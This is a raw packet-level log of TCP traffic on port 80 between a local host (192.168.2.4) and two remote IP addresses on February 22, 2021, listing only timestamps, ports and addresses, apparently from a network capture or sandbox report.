Feb 22, 2021 09:14:57.753170013 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753209114 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753246069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753251076 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753285885 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753294945 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753339052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753379107 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753447056 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753489017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753532887 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753534079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753572941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753611088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753635883 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753650904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753690958 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753750086 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753803015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753846884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753861904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753886938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753937960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.753954887 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.753977060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754019022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754034042 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.754060030 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754096985 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754113913 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.754136086 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754169941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754206896 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.754359007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754415035 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754422903 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.754453897 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754492044 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754503965 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.754530907 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754570007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754574060 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.754606009 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.754646063 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786066055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786098003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786114931 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786133051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786150932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786170959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786189079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786190987 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786202908 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786217928 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786226034 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786247015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786247969 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786267042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786288023 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786305904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786318064 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786324978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786350012 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786353111 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786371946 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786381006 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786401033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786417007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786421061 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786431074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786448002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786463022 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786464930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786484003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786490917 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.786503077 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.786546946 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787184000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787204027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787221909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787240028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787252903 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787259102 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787276983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787293911 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787295103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787313938 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787313938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787337065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787347078 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787354946 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787375927 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787770033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787789106 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787805080 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787821054 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787828922 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787837982 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787842989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.787857056 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:57.787898064 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:57.839857101 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.839963913 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.858860016 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.912204027 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912267923 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912308931 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912358999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912401915 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912400961 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.912442923 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912471056 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.912501097 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912543058 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.912544966 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912583113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912623882 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912643909 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.912672997 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912683964 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.912719011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.912784100 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.913300991 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.913345098 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.913404942 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.913471937 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.913487911 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.913517952 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.913548946 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.913656950 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.914222956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.914376974 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.914434910 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.914453983 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.914489031 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.914541006 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.914592981 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.914599895 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.914655924 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.915138960 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.915200949 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.915254116 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.915307999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.915322065 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.915365934 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.915366888 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.915421009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.915976048 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.916116953 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.916176081 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.916234016 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.916289091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.916309118 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.916346073 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.916351080 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.916399956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.916935921 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.916999102 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917048931 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917154074 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.917190075 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917251110 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917306900 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917325020 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.917366028 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.917776108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917831898 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917887926 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917943001 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917958021 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.917995930 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.917996883 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.918037891 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.918595076 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.918658018 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.918685913 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.918711901 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.918725967 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.918765068 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.918817997 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.918869019 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.918878078 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.918926954 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.919591904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.919666052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.919728994 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.919790983 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.919807911 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.919848919 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.919893980 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.919909000 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.920321941 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.920382023 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.920433998 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.920449018 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.920489073 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.920504093 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.920607090 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.920655012 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.920711040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.921257019 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.921333075 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.921380997 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.921423912 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.921427965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.921492100 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.921550989 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.921602964 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.921708107 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.921719074 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.922138929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.922202110 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.922256947 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.922308922 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.922349930 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.922363043 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.922368050 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.922414064 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.922657013 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.923012018 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.923074007 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.923130989 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.923135996 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.923197031 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.923252106 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.923259020 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.923300982 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.923360109 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.924078941 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924143076 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924197912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924221039 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.924257040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924315929 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.924318075 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924369097 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924417973 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.924822092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924885035 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924935102 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.924976110 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.924995899 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925101042 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.925137997 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925194025 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925302029 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.925739050 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925796032 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925847054 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925909996 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925919056 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.925964117 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.925980091 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.926021099 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.926661015 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.926721096 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.926768064 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.926773071 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.926789045 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.926826000 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.926877975 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.926882982 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.926934958 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.927577019 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.927635908 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.927676916 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.927690983 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.927695036 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.927745104 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.927774906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.927802086 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.927805901 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.927964926 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.928338051 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.928369999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.928400993 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.928426981 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.928431034 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.928463936 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.928494930 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.928512096 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.928555012 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.929250956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.929289103 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.929378986 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.929466009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.929502010 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.929532051 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.929564953 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.929634094 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.929651022 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.930161953 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.930197001 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.930227041 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.930265903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.930289030 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.930298090 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.930326939 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.930332899 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.930373907 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.931086063 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931128979 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931157112 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931190014 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931196928 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.931220055 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931248903 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.931251049 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931307077 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.931921959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931962013 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.931993961 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.932013988 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.932050943 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.932136059 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.932146072 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.932182074 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.932256937 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.965889931 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.965961933 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966006041 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966053963 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966069937 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.966114044 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966154099 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966249943 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966290951 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966314077 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.966329098 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.966330051 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966350079 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.966367006 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966598034 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.966835976 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966880083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966922045 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.966953039 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.966964006 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967011929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967056036 CET	80	49767	104.21.71.230	192.168.2.4
